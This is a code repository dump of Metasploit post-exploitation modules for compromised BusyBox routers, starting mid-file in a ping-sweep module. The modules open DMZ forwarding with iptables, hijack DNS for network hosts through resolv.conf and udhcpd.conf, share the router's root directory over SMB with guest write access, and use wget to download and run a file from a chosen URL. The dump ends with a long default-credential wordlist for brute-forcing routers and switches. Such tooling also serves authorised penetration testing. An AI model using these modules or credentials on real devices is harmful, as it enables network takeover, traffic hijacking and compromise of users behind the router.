30 | OptAddress.new('IPRANGESTART', [ true, "The first ip address of the range to ping.", nil ]), 31 | OptAddress.new('IPRANGEEND', [ true, "The last ip address of the range to ping.", nil ]) 32 | ], self.class) 33 | 34 | end 35 | 36 | def run 37 | 38 | #this module will send a sh script for busybox shell for doing ping to a range of ip address from 39 | #the router or device that is executing busybox. It could be possible to calculate each ip address 40 | #of the range of ip addresses in the ruby script and execute each ping command with cmd_exec, but 41 | #it would generate an unnecesary traffic in the connection with the busybox device (usually telnet) 42 | 43 | sh_script_lines=[ 44 | "#!/bin/sh", 45 | "param1=#{datastore['IPRANGESTART']}", 46 | "param2=#{datastore['IPRANGEEND']}", 47 | "while true;", 48 | " param1cpy=\"$param1\"", 49 | " pos=`expr index \"$param1cpy\" \".\"`", 50 | " pos=`expr $pos - 1`", 51 | " octec1=`expr substr \"$param1cpy\" 1 $pos`", 52 | " pos=`expr $pos + 2`", 53 | " len=`expr length \"$param1cpy\"`", 54 | " param1cpy=`expr substr \"$param1cpy\" $pos $len`", 55 | " pos=`expr index \"$param1cpy\" \".\"`", 56 | " pos=`expr $pos - 1`", 57 | " octec2=`expr substr \"$param1cpy\" 1 $pos`", 58 | " pos=`expr $pos + 2`", 59 | " len=`expr length \"$param1cpy\"`", 60 | " param1cpy=`expr substr \"$param1cpy\" $pos $len`", 61 | " pos=`expr index \"$param1cpy\" \".\"`", 62 | " pos=`expr $pos - 1`", 63 | " octec3=`expr substr \"$param1cpy\" 1 $pos`", 64 | " pos=`expr $pos + 2`", 65 | " len=`expr length \"$param1cpy\"`", 66 | " param1cpy=`expr substr \"$param1cpy\" $pos $len`", 67 | " octec4=\"$param1cpy\"", 68 | " carry=0", 69 | " len=`expr length \"$octec4\"`", 70 | " temp=`expr match \"$octec4\" \"255\"`", 71 | " if [ $temp -eq $len ]; then", 72 | " octec4=0", 73 | " carry=1", 74 | " else", 75 | " octec4=`expr $octec4 + 1`", 76 | " fi", 77 | " if [ $carry -eq 1 ]; then", 78 | " carry=0", 79 | " len=`expr length \"$octec3\"`", 80 | " temp=`expr match \"$octec3\" \"255\"`", 81 | " if [ $temp -eq $len ]; then", 82 | " octec3=0", 83 | " carry=1", 84 | " else", 85 | " octec3=`expr \"$octec3\" + 1`", 86 | " fi", 87 | " fi", 88 | " if [ $carry -eq 1 ]; then", 89 | " carry=0", 90 | " len=`expr length \"$octec2\"`", 91 | " temp=`expr match \"$octec2\" \"255\"`", 92 | " if [ $temp -eq $len ]; then", 93 | " octec2=0", 94 | " carry=1", 95 | " else", 96 | " octec2=`expr $octec2 + 1`", 97 | " fi", 98 | " fi", 99 | " if [ $carry -eq 1 ]; then", 100 | " carry=0", 101 | " len=`expr length \"$octec1\"`", 102 | " temp=`expr match \"$octec1\" \"255\"`", 103 | " if [ $temp -eq $len ]; then", 104 | " octec1=0", 105 | " carry=1", 106 | " else", 107 | " octec1=`expr $octec1 + 1`", 108 | " fi", 109 | " fi", 110 | " ping -c 1 \"$param1\"", 111 | " param1=\"$octec1\"\".\"\"$octec2\"\".\"\"$octec3\"\".\"\"$octec4\"", 112 | " temp=`expr match \"$param1\" \"$param2\"`", 113 | " len=`expr length \"$param2\"`", 114 | " if [ $temp -eq $len ]; then", 115 | " ping -c 1 \"$param1\"", 116 | " break", 117 | " fi", 118 | "done" 119 | ] 120 | 121 | begin 122 | #send script and receive echos 123 | count=0 124 | sh_script_lines.each do |sh_script_line| 125 | session.shell_write(sh_script_line + "\n") 126 | count+=1 127 | result=session.shell_read() #receive echos 128 | vprint_status(result) 129 | Rex::sleep(0.03) 130 | end 131 | rescue 132 | print_error("Problems were found while sending script to the BusyBox device.") 133 | return 134 | end 135 | Rex::sleep(1.00) 136 | 137 | full_results = "" 138 | begin 139 | #receiving ping results 140 | count=0 141 | print_status("Script has been sent to the busybox device. Doing ping to the range of addresses.") 142 | while count<15 #we stop when we have been 15 seconds without receiving responses 143 | result = session.shell_read() 144 | if result.length>0 145 | count=0 146 | print_status(result) 147 | full_results << result 148 | else 149 | vprint_status("No response.") 150 | count+=1 151 | end 152 | Rex::sleep(1.00) 153 | end 154 | rescue 155 | print_warning("Problems were found while receiving ping results. Probably remote device terminated the connection.\nResults that were already received will be kept.") 156 | end 157 | 158 | #storing results 159 | 160 | p = store_loot("Pingnet", "text/plain", session, full_results, "#{datastore['IPRANGESTART']}"+"-"+"#{datastore['IPRANGEEND']}", "BusyBox Device Network Range Pings") 161 | print_good("Pingnet results saved to #{p}.") 162 | 163 | end 164 | 165 | end 166 | -------------------------------------------------------------------------------- /busybox_setdmz.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | def initialize 11 | super( 12 | 'Name' => 'BusyBox Set Dmz', 13 | 'Description' => 'This module will be applied on a session connected 14 | to a BusyBox sh shell. The script will enable or disable dmz 15 | to a network host in the router or device executing BusyBox.', 16 | 'Author' => 'Javier Vicente Vallejo', 17 | 'License' => MSF_LICENSE, 18 | 'References' => 19 | [ 20 | [ 'URL', 'http://vallejo.cc'] 21 | ], 22 | 'Platform' => ['linux'], 23 | 'SessionTypes' => ['shell'] 24 | ) 25 | 26 | register_options([ 27 | OptAddress.new('TARGETHOST', [ true, "The address of the host to be target for the dmz", nil ]), 28 | OptBool.new('DELETE', [false, "If this option is set to true, the DMZ is removed. Else it is added.", false]) 29 | ], self.class) 30 | 31 | end 32 | 33 | def run 34 | 35 | if datastore['DELETE'] == true 36 | vprint_status("Executing iptables to delete dmz.") 37 | vprint_status(cmd_exec("iptables -D FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT")) 38 | else 39 | vprint_status("Executing iptables to add dmz.") 40 | vprint_status(cmd_exec("iptables -A FORWARD -d #{datastore['TARGETHOST']} -j ACCEPT")) 41 | end 42 | if datastore['VERBOSE'] 43 | vprint_status(cmd_exec("iptables --list")) 44 | end 45 | print_good("Dmz modified. Enable verbose for additional information.") 46 | 47 | end 48 | 49 | end 50 | -------------------------------------------------------------------------------- /busybox_setdns.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | include Msf::Post::File 11 | 12 | def initialize 13 | super( 14 | 'Name' => 'BusyBox Set Dns', 15 | 'Description' => 'This module will be applied on a session connected 16 | to a BusyBox sh shell. The script will set dns addresses 17 | to the router or device executing BusyBox to be sent 18 | by dhcp server to network hosts.', 19 | 'Author' => 'Javier Vicente Vallejo', 20 | 'License' => MSF_LICENSE, 21 | 'References' => 22 | [ 23 | [ 'URL', 'http://vallejo.cc'] 24 | ], 25 | 'Platform' => ['linux'], 26 | 'SessionTypes' => ['shell'] 27 | ) 28 | 29 | register_options( 30 | [ 31 | OptAddress.new('SRVHOST', [ true, "The dns server address.", nil ]) 32 | ], self.class) 33 | 34 | end 35 | 36 | #The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update 37 | #udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp 38 | 39 | def run 40 | 41 | workdone = false 42 | vprint_status("Searching for files to modify dns server.") 43 | if file_exists("/etc/resolv.conf") 44 | vprint_status("Resolv.conf found.") 45 | if is_writable_and_write("/etc/resolv.conf", "nameserver #{datastore['SRVHOST']}", false) 46 | print_good("Dns server added to resolv.conf.") 47 | workdone = true 48 | end 49 | end 50 | if file_exists("/etc/udhcpd.conf") 51 | vprint_status("Udhcpd.conf found.") 52 | original_content = read_file("/etc/udhcpd.conf") 53 | vprint_status("Original udhcpd.conf content:") 54 | vprint_status(original_content) 55 | if is_writable_and_write("/etc/udhcpd.conf", "option dns #{datastore['SRVHOST']}", false) 56 | vprint_status("Udhcpd.conf is writable.") 57 | is_writable_and_write("/etc/udhcpd.conf", original_content, true) 58 | vprint_status("Relaunching udhcp server:") 59 | cmd_exec("killall dhcpd\n") 60 | cmd_exec("dhcpd /etc/udhcpd.conf &\n") 61 | print_good("Udhcpd.conf modified and dns server added. Dhcpd restarted.") 62 | else 63 | vprint_status("Unable to write udhcpd.conf. Trying to copy the file to a writable directory.") 64 | writable_directory = nil 65 | vprint_.status("Trying to find writable directory.") 66 | writable_directory = "/etc/" if is_writable_and_write("/etc/tmp.conf", "x", false) 67 | writable_directory = "/mnt/" if (!writable_directory && is_writable_and_write("/mnt/tmp.conf", "x", false)) 68 | writable_directory = "/var/" if (!writable_directory && is_writable_and_write("/var/tmp.conf", "x", false)) 69 | writable_directory = "/var/tmp/" if (!writable_directory && is_writable_and_write("/var/tmp/tmp.conf", "x", false)) 70 | if writable_directory 71 | vprint_status("writable directory found, creating a copy of the original udhcpd.conf.") 72 | is_writable_and_write("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", false) 73 | is_writable_and_write("#{writable_directory}tmp.conf", original_content, true) 74 | vprint_status("Relaunching udhcp server:") 75 | cmd_exec("killall dhcpd\n") 76 | cmd_exec("dhcpd #{writable_directory}tmp.conf &\n") 77 | print_good("Udhcpd.conf copied to writable directory and dns server added. Dhcpd restarted.") 78 | workdone = true 79 | else 80 | vprint_error("Writable directory not found.") 81 | end 82 | end 83 | end 84 | if !workdone 85 | print_error("Unable to modify dns server.") 86 | end 87 | 88 | end 89 | 90 | #This function checks if the target file is writable and writes or append the data given as parameter. 91 | #BusyBox shell's commands are limited and Msf > Post > File > write_file function doesnt work here, for 92 | #this reason it is necessary to implement an specific function 93 | 94 | def is_writable_and_write(file_path, data, append) 95 | if append 96 | data = read_file(file_path) + "\n" + data 97 | end 98 | rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr} 99 | session.shell_write("echo #{rand_str} > #{file_path}\n"); Rex::sleep(0.1) 100 | session.shell_read(); Rex::sleep(0.1) 101 | if read_file(file_path).include? rand_str 102 | session.shell_write("echo \"\"> #{file_path}\n"); Rex::sleep(0.1) 103 | session.shell_read(); Rex::sleep(0.1) 104 | lines = data.lines.map(&:chomp) 105 | lines.each do |line| 106 | session.shell_write("echo #{line.chomp} >> #{file_path}\n"); Rex::sleep(0.1) 107 | session.shell_read(); Rex::sleep(0.1) 108 | end 109 | return true 110 | else 111 | return false 112 | end 113 | end 114 | 115 | #file? doesnt work because test -f is not implemented in busybox 116 | def file_exists(file_path) 117 | s = read_file(file_path) 118 | if s and s.length 119 | return true 120 | end 121 | return false 122 | end 123 | 124 | end 125 | -------------------------------------------------------------------------------- /busybox_smb_share_root.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | include Msf::Post::File 11 | 12 | def initialize 13 | super( 14 | 'Name' => 'BusyBox Smb Share Root', 15 | 'Description' => 'This module will be applied on a session connected 16 | to a BusyBox sh shell. The script will modify the 17 | smb configuration of the the router or device executing 18 | BusyBox to share the root directory of the device.', 19 | 'Author' => 'Javier Vicente Vallejo', 20 | 'License' => MSF_LICENSE, 21 | 'References' => 22 | [ 23 | [ 'URL', 'http://vallejo.cc'] 24 | ], 25 | 'Platform' => ['linux'], 26 | 'SessionTypes' => ['shell'] 27 | ) 28 | 29 | end 30 | 31 | def run 32 | vprint_status("Trying to find smb.conf.") 33 | if read_file("/var/samba/smb.conf").length > 0 #file? doesnt work because test -f is not implemented in busybox 34 | vprint_status("Smb.conf found.") 35 | vprint_status("Trying to find writable directory.") 36 | writable_directory = nil 37 | writable_directory = "/etc/" if is_writable_directory("/etc") 38 | writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt")) 39 | writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var")) 40 | writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp")) 41 | if writable_directory 42 | vprint_status("writable directory found, copying smb.conf.") 43 | vprint_status(cmd_exec("rm -f #{writable_directory}smb.conf")); Rex::sleep(0.1) 44 | vprint_status(cmd_exec("cp -f /var/samba/smb.conf #{writable_directory}smb.conf")); Rex::sleep(0.1) 45 | vprint_status(cmd_exec("echo -e '[rootdir]\ncomment = rootdir\npath = /\nbrowseable = yes\nwriteable = yes\nguest ok = yes\n' >> #{writable_directory}smb.conf")); Rex::sleep(0.1) 46 | vprint_status(cmd_exec("killall smbd")); Rex::sleep(0.1) 47 | vprint_status(cmd_exec("smbd -D -s #{writable_directory}smb.conf")); Rex::sleep(0.1) 48 | vprint_status(cmd_exec("smbd -D -s=#{writable_directory}smb.conf")); Rex::sleep(0.1) 49 | print_good("Smb configuration has been modified.") 50 | else 51 | print_error("Writable directory not found.") 52 | end 53 | else 54 | print_error("Smb.conf not found.") 55 | end 56 | end 57 | 58 | #This function checks if the target directory is writable 59 | def is_writable_directory(directory_path) 60 | retval = false 61 | rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr} 62 | file_path = directory_path + "/" + rand_str 63 | session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1) 64 | (1..5).each{session.shell_read(); Rex::sleep(0.1)} 65 | rcv = read_file(file_path) 66 | vprint_status("is_writable_directory:"+rcv) 67 | if rcv.include? (rand_str+"XXX"+rand_str) 68 | retval = true 69 | end 70 | cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1) 71 | return retval 72 | end 73 | 74 | end 75 | -------------------------------------------------------------------------------- /busybox_wgetandexec.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class Metasploit3 < Msf::Post 9 | 10 | include Msf::Post::File 11 | 12 | def initialize 13 | super( 14 | 'Name' => 'BusyBox Wget and Exec', 15 | 'Description' => 'This module will be applied on a session connected 16 | to a BusyBox sh shell. The script will use wget to download 17 | a file to the router or device executing BusyBox and then 18 | it executes the download file.', 19 | 'Author' => 'Javier Vicente Vallejo', 20 | 'License' => MSF_LICENSE, 21 | 'References' => 22 | [ 23 | [ 'URL', 'http://vallejo.cc'] 24 | ], 25 | 'Platform' => ['linux'], 26 | 'SessionTypes' => ['shell'] 27 | ) 28 | 29 | register_options( 30 | [ 31 | OptString.new('URL', [true, 'Full URL of file to download.']) 32 | ], self.class) 33 | 34 | end 35 | 36 | #The module tries to update resolv.conf file with the SRVHOST dns address. It tries to update 37 | #udhcpd.conf too, with SRVHOST dns address, that should be given to network's hosts via dhcp 38 | 39 | def run 40 | vprint_status("Trying to find writable directory.") 41 | writable_directory = nil 42 | writable_directory = "/etc/" if is_writable_directory("/etc") 43 | writable_directory = "/mnt/" if (!writable_directory && is_writable_directory("/mnt")) 44 | writable_directory = "/var/" if (!writable_directory && is_writable_directory("/var")) 45 | writable_directory = "/var/tmp/" if (!writable_directory && is_writable_directory("/var/tmp")) 46 | if writable_directory 47 | vprint_status("writable directory found, downloading file.") 48 | rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr} 49 | random_file_path = writable_directory + rand_str 50 | cmd_exec("wget -O #{random_file_path} #{datastore['URL']}"); Rex::sleep(0.1) 51 | if file_exists(random_file_path) 52 | print_good("File downloaded using wget. Executing it.") 53 | cmd_exec("chmod 777 #{random_file_path}"); Rex::sleep(0.1) 54 | vprint_status(cmd_exec("sh #{random_file_path}")) 55 | else 56 | print_error("Unable to download file.") 57 | end 58 | else 59 | print_error("Writable directory not found.") 60 | end 61 | end 62 | 63 | #This function checks if the target directory is writable 64 | 65 | def is_writable_directory(directory_path) 66 | retval = false 67 | rand_str = ""; 16.times{rand_str << (65 + rand(25)).chr} 68 | file_path = directory_path + "/" + rand_str 69 | session.shell_write("echo #{rand_str}XXX#{rand_str} > #{file_path}\n"); Rex::sleep(0.1) 70 | (1..5).each{session.shell_read(); Rex::sleep(0.1)} 71 | rcv = read_file(file_path) 72 | vprint_status("is_writable_directory:"+rcv) 73 | if rcv.include? (rand_str+"XXX"+rand_str) 74 | retval = true 75 | end 76 | cmd_exec("rm -f #{file_path}"); Rex::sleep(0.1) 77 | return retval 78 | end 79 | 80 | #file? doesnt work because test -f is not implemented in busybox 81 | def file_exists(file_path) 82 | s = read_file(file_path) 83 | if s and s.length 84 | return true 85 | end 86 | return false 87 | end 88 | 89 | end 90 | -------------------------------------------------------------------------------- /routers_userpass.txt: -------------------------------------------------------------------------------- 1 | debug synnet 2 | tech tech 3 | adminttd adminttd 4 | admin comcomcom 5 | admin admin 6 | admin synnet 7 | monitor monitor 8 | manager manager 9 | admin password 10 | User Password 11 | Administrator admin 12 | security security 13 | 3comcso RIP000 14 | recovery recovery 15 | volition volition 16 | Administrator 3ware 17 | sysadm anicust 18 | Admin admin 19 | none 0 20 | admin secure 21 | kermit kermit 22 | dhs3mt dhs3mt 23 | at4400 at4400 24 | mtch mtch 25 | mtcl mtcl 26 | root letacla 27 | dhs3pms dhs3pms 28 | adfexc adfexc 29 | client client 30 | install llatsni 31 | halt tlah 32 | admin switch 33 | diag switch 34 | root permit 35 | ftp_inst pbxk1064 36 | ftp_admi kilo1987 37 | ftp_oper help1954 38 | ftp_nmc tuxalize 39 | manager friend 40 | manager admin 41 | Manager friend 42 | none admin 43 | admin linga 44 | root root 45 | user user 46 | admin cableroot 47 | acc acc 48 | device device 49 | apc apc 50 | root admin 51 | root alpine 52 | admin 0 53 | IntraSwitch Asante 54 | IntraStack Asante 55 | admin asante 56 | readonly lucenttech2 57 | root ascend 58 | admin epicrouter 59 | customer none 60 | DTA TJM 61 | admin atlantis 62 | root ROOT500 63 | diag danger 64 | manuf xxyyzz 65 | craft crftpw 66 | root cms500 67 | dadmin dadmin01 68 | root pass 69 | admin bintec 70 | admin articon 71 | patrol patrol 72 | webadmin webadmin 73 | installer installer 74 | root fivranne 75 | admin 1234 76 | mediator mediator 77 | root Mau'dib 78 | cellit cellit 79 | admin diamond 80 | cmaker cmaker 81 | admin changeme 82 | netrangr attack 83 | bbsd-client changeme2 84 | bbsd-client NULL 85 | Administrator changeme 86 | root attack 87 | admin default 88 | Cisco Cisco 89 | admin cisco 90 | root blender 91 | hsa hsadb 92 | wlse wlsedb 93 | root Cisco 94 | admin system 95 | user tivonpw 96 | cisco cisco 97 | administrator administrator 98 | user user 99 | operator operator 100 | user public 101 | PFCUser 240653C9467E45 102 | corecess corecess 103 | cgadmin cgadmin 104 | super surt 105 | root tslinux 106 | D-Link D-Link 107 | root tini 108 | anonymous any@ 109 | root davox 110 | davox davox 111 | MDaemon MServer 112 | root calvin 113 | admin my_DEMARC 114 | PBX PBX 115 | NETWORK NETWORK 116 | admin michelangelo 117 | user password 118 | draytek 1234 119 | admin 123 120 | login admin 121 | login password 122 | admin netadmin 123 | tiger tiger123 124 | websecadm changeme 125 | netman netman 126 | 1111 1111 127 | supervisor supervisor 128 | anonymous Exabyte 129 | root default 130 | admin radius 131 | admin isee 132 | MGR HPP187 133 | MGR HPP189 134 | MGR HPP196 135 | MGR INTX3 136 | MGR ITF3000 137 | MGR NETBASE 138 | MGR REGO 139 | MGR RJE 140 | MGR CONV 141 | OPERATOR SYS 142 | OPERATOR DISC 143 | OPERATOR SYSTEM 144 | OPERATOR SUPPORT 145 | OPERATOR COGNOS 146 | PCUSER SYS 147 | RSBCMON SYS 148 | SPOOLMAN HPOFFICE 149 | WP HPOFFICE 150 | ADVMAIL HPOFFICE DATA 151 | ADVMAIL HP 152 | FIELD SUPPORT 153 | FIELD MGR 154 | FIELD SERVICE 155 | FIELD MANAGER 156 | FIELD HPP187 SYS 157 | FIELD LOTUS 158 | FIELD HPWORD PUB 159 | FIELD HPONLY 160 | HELLO MANAGER.SYS 161 | HELLO MGR.SYS 162 | HELLO FIELD.SUPPORT 163 | HELLO OP.OPERATOR 164 | MAIL MAIL 165 | MAIL REMOTE 166 | MAIL TELESUP 167 | MAIL HPOFFICE 168 | MAIL MPE 169 | MANAGER TCH 170 | MANAGER SYS 171 | MANAGER SECURITY 172 | MANAGER ITF3000 173 | MANAGER HPOFFICE 174 | MANAGER COGNOS 175 | MANAGER TELESUP 176 | MGR SYS 177 | MGR CAROLIAN 178 | MGR VESOFT 179 | MGR XLSERVER 180 | MGR SECURITY 181 | MGR TELESUP 182 | MGR HPDESK 183 | MGR CCC 184 | MGR CNAS 185 | MGR WORD 186 | MGR COGNOS 187 | MGR ROBELLE 188 | MGR HPOFFICE 189 | MGR HPONLY 190 | admin hp.com 191 | storwatch specialist 192 | vt100 public 193 | superadmin secret 194 | hscroot abc123 195 | USERID PASSW0RD 196 | Administrator pilou 197 | Administrator letmein 198 | NICONEX NICONEX 199 | setup setup 200 | intel intel 201 | admin hello 202 | admin giraff 203 | SYSDBA masterkey 204 | intermec intermec 205 | operator $chwarzepumpe 206 | system sys 207 | admin operator 208 | admin ironport 209 | JDE JDE 210 | PRODDTA PRODDTA 211 | netscreen netscreen 212 | superuser 123456 213 | admin 123456 214 | sysadmin PASS 215 | login access 216 | comcast 1234 217 | setup changeme 218 | setup changeme! 219 | super super 220 | xxx cascade 221 | admin Ascend 222 | readwrite lucenttech1 223 | LUCENT01 UI-PSWD-01 224 | LUCENT02 UI-PSWD-02 225 | admin AitbISP4eCiG 226 | bciim bciimpw 227 | bcim bcimpw 228 | bcms bcmspw 229 | bcnas bcnaspw 230 | blue bluepw 231 | browse browsepw 232 | browse looker 233 | craft craft 234 | craft craftpw 235 | cust custpw 236 | enquiry enquirypw 237 | field support 238 | inads indspw 239 | inads inads 240 | init initpw 241 | locate locatepw 242 | maint maintpw 243 | maint rwmaint 244 | nms nmspw 245 | rcust rcustpw 246 | support supportpw 247 | tech field 248 | scmadmin scmchangeme 249 | Administrator password 250 | MICRO RSX 251 | service smile 252 | system password 253 | cablecom router 254 | admin motorola 255 | router router 256 | SYSADM sysadm 257 | admin admin123 258 | GlobalAdmin GlobalAdmin 259 | super 5777364 260 | superman 21241036 261 | naadmin naadmin 262 | netopia netopia 263 | admin noway 264 | admin NetCache 265 | e500 e500changeme 266 | e250 e250changeme 267 | guest guest 268 | admin asd 269 | vcr NetVCR 270 | m1122 m1122 271 | telecom telecom 272 | disttech 4tas 273 | maint maint 274 | mlusr mlusr 275 | admin root 276 | l2 l2 277 | l3 l3 278 | ro ro 279 | rw rw 280 | rwa rwa 281 | admin setup 282 | login 0 283 | login 1111 284 | login 8429 285 | spcl 0 286 | root 3ep5w2u 287 | maint ntacdmax 288 | ccrusr ccrusr 289 | supervisor PlsChgMe! 290 | 266344 266344 291 | supervisor PlsChgMe1 292 | admin adslolitec 293 | admin OCS 294 | adminstat OCS 295 | adminview OCS 296 | adminuser OCS 297 | helpdesk OCS 298 | sys uplink 299 | cac_admin cacadmin 300 | system sys 301 | manager change_on_install 302 | admin kont2004 303 | Manager Manager 304 | sysadm sysadm 305 | write private 306 | debug d.e.b.u.g 307 | echo echo 308 | PSEAdmin $secure$ 309 | admin superuser 310 | admin mu 311 | admin microbusiness 312 | admin smallbusiness 313 | Polycom SpIp 314 | support h179350 315 | lp lp 316 | radware radware 317 | wradmin trancell 318 | piranha q 319 | piranha piranha 320 | sysadmin password 321 | setup changeme 322 | teacher password 323 | temp1 password 324 | admin rmnetlm 325 | admin2 changeme 326 | adminstrator changeme 327 | deskalt password 328 | deskman changeme 329 | desknorm password 330 | deskres password 331 | replicator replicator 332 | RMUser1 password 333 | topicalt password 334 | topicnorm password 335 | topicres password 336 | root 1234 337 | public public 338 | admin w2402 339 | GEN1 gen1 340 | GEN2 gen2 341 | ADMN admn 342 | eng engineer 343 | op op 344 | op operator 345 | su super 346 | poll tech 347 | sysadmin sysadmin 348 | admin pwp 349 | superuser admin 350 | admin hagpolm1 351 | Administrator ganteng 352 | Administrator smcadmin 353 | admin barricade 354 | smc smcadmin 355 | admin smcadmin 356 | cusadmin highspeed 357 | 1.79 + Multi 358 | aaa often blank 359 | admin Protector 360 | admin conexant 361 | admin xad$l#12 362 | root changeme 363 | Sweex Mysweex 364 | target password 365 | install secret 366 | super.super master 367 | xbox xbox 368 | telco telco 369 | tellabs tellabs#1 370 | root admin_1 371 | tiara tiaranet 372 | superman talent 373 | admin extendnet 374 | root 12345 375 | cablemodem robotics 376 | NAU NAU 377 | ADMINISTRATOR ADMINISTRATOR 378 | HTTP HTTP 379 | Any 12345 380 | support support 381 | VTech VTech 382 | admin visual 383 | root 123456 384 | CSG SESAME 385 | user pass 386 | admin sysAdmin 387 | root wyse 388 | VNC winterm 389 | rapport r@p8p0r+ 390 | 1502 1502 391 | xd xd 392 | admin 2222 393 | admin 22222 394 | admin 1111 395 | admin zoomadsl 396 | ZXDSL ZXDSL 397 | 1234 1234 398 | webadmin 1234 --------------------------------------------------------------------------------